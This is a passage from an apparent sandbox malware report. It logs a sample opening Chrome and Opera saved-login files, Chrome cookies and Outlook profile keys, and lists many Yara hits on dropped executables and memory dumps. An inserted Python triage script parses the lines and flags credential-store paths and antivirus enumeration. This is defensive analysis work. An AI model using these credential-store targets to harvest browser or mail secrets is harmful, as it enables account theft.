Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
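The behaviour lines in this report (the repeated AntiVirusProduct enumerations through root\securitycenter2 and root\securitycenter from wscript.exe, the Yara hits on dropped files and memory dumps, and the rundll32.exe/cmd.exe opens of browser and Outlook credential stores) are the raw material an analyst turns into indicators. The Python below is an added example, not part of the report and not Joe Sandbox code: it parses lines in the report's `Source: <process> <event kind>: <details>` shape, counts AV-product enumerations per WMI namespace, records which process opened which credential store, and dedupes Yara sources by type. The sample input is a constructed subset copied from the lines above; the regexes, function names and the credential-store marker list are my own, and the two Firefox markers (logins.json, key4.db) come from general knowledge rather than from this page.

```python
"""Triage helper for sandbox behaviour lines (added example, not Joe Sandbox code).

Lines have the shape  "Source: <process or dump> <event kind>: <details>".
"""
import re
from collections import Counter, defaultdict

# Constructed sample: a subset of lines copied from the report above.
SAMPLE_LINES = r"""
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: Yara match File source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED
Source: Yara match File source: Process Memory Space: wscript.exe PID: 7152, type: MEMORYSTR
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
"""

# One regex per event kind; the process path is matched non-greedily so
# paths with spaces (e.g. "Program Files (x86)") still parse.
WMI_RE = re.compile(
    r"^Source: (?P<proc>.+?) WMI Queries: IWbemServices::\w+ - "
    r"(?P<namespace>\S+) : (?P<cls>\S+)$"
)
YARA_RE = re.compile(r"^Source: Yara match File source: (?P<src>.+?), type: (?P<type>\w+)$")
ACCESS_RE = re.compile(
    r"^Source: (?P<proc>.+?) (?P<op>File opened|Key opened): (?P<target>.+?)"
    r"(?: Jump to behavior)?$"
)
PATTERNS = (("wmi", WMI_RE), ("yara", YARA_RE), ("access", ACCESS_RE))

# Substrings that mark credential stores. The first three occur in this
# report; the Firefox entries are an assumption added from general knowledge.
CREDENTIAL_STORE_MARKERS = (
    "\\Login Data",                            # Chromium-family saved logins
    "\\Cookies",                               # Chromium-family session cookies
    "Windows Messaging Subsystem\\Profiles",   # Outlook MAPI profiles (mail creds)
    "logins.json",                             # Firefox saved logins (assumption)
    "key4.db",                                 # Firefox key database (assumption)
)


def parse(text):
    """Turn raw behaviour lines into typed event dicts; unrecognised lines are skipped."""
    events = []
    for line in (l.strip() for l in text.splitlines() if l.strip()):
        for kind, rx in PATTERNS:
            m = rx.match(line)
            if m:
                events.append({"kind": kind, **m.groupdict()})
                break
    return events


def av_enumeration(events):
    """Count AntiVirusProduct enumerations per (process, WMI namespace)."""
    counts = Counter()
    for e in events:
        if e["kind"] == "wmi" and e["cls"].lower() == "antivirusproduct":
            counts[(e["proc"], e["namespace"].lower())] += 1
    return counts


def credential_access(events):
    """Map each process to the credential stores it opened (files or registry keys)."""
    hits = defaultdict(set)
    for e in events:
        if e["kind"] != "access":
            continue
        if any(mk.lower() in e["target"].lower() for mk in CREDENTIAL_STORE_MARKERS):
            hits[e["proc"]].add(e["target"])
    return {proc: sorted(targets) for proc, targets in hits.items()}


def yara_sources(events):
    """Unique Yara-matched sources grouped by source type (DROPPED, MEMORY, ...)."""
    grouped = defaultdict(set)
    for e in events:
        if e["kind"] == "yara":
            grouped[e["type"]].add(e["src"])
    return {t: sorted(srcs) for t, srcs in grouped.items()}


if __name__ == "__main__":
    ev = parse(SAMPLE_LINES)
    for (proc, ns), n in sorted(av_enumeration(ev).items()):
        print(f"{n}x AntiVirusProduct via {ns} from {proc}")
    for proc, targets in credential_access(ev).items():
        print(f"{proc} opened credential stores: {targets}")
    for t, srcs in yara_sources(ev).items():
        print(f"Yara {t}: {len(srcs)} unique source(s)")
```

Two notes on the design. Keying the AV counts on the namespace is deliberate: the root\securitycenter2 namespace is where Security Center exposes registered AV products on client Windows, and a script that enumerates it before doing anything else is performing environment reconnaissance, which is worth flagging on its own. The Yara dedupe collapses the doubled DROPPED entry for oxx7nkdv4g8.exe; the report's listing does not show which rule fired on each line, so if the rule name is available in your export, keep it as part of the key rather than collapsing to the path alone.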

Remote Access Functionality

Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.bin.exe.10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.bin.exe.10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000000.888258763.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.577518053.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.577466338.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.577252910.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.539227750.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.981077246.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000001.447624352.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1028333019.0000000004867000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.972949650.0000000000484000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.891623399.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.451386308.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.887276277.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.447599993.000001C6B5DA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.515738987.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.887613995.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.447905033.000001C6B609A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.982531208.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.447458593.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.959879577.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.455268485.000001C6B6770000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.452309362.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.454366130.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448608329.000001C6B5E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.887927975.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED
Source: Yara match File source: 00000002.00000002.959380851.0000015595548000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.964474352.000002A0FC393000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.961147065.0000019173A2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.964554613.000002CA0370B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.961594354.000001559722F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.512701190.000002A0FE195000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.961930563.0000019175726000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.990991085.000002CA0506D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.972899634.000002A0FE18A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.964440619.000002A0FC389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.959396798.0000015595552000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.512633458.000002A0FE195000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 7152, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 3576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 1408, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6416, type: MEMORYSTR
[Legend from the contacted-IPs map graphic: shading bins for No. of IPs < 25%, 25% to 50%, 50% to 75%, and > 75%]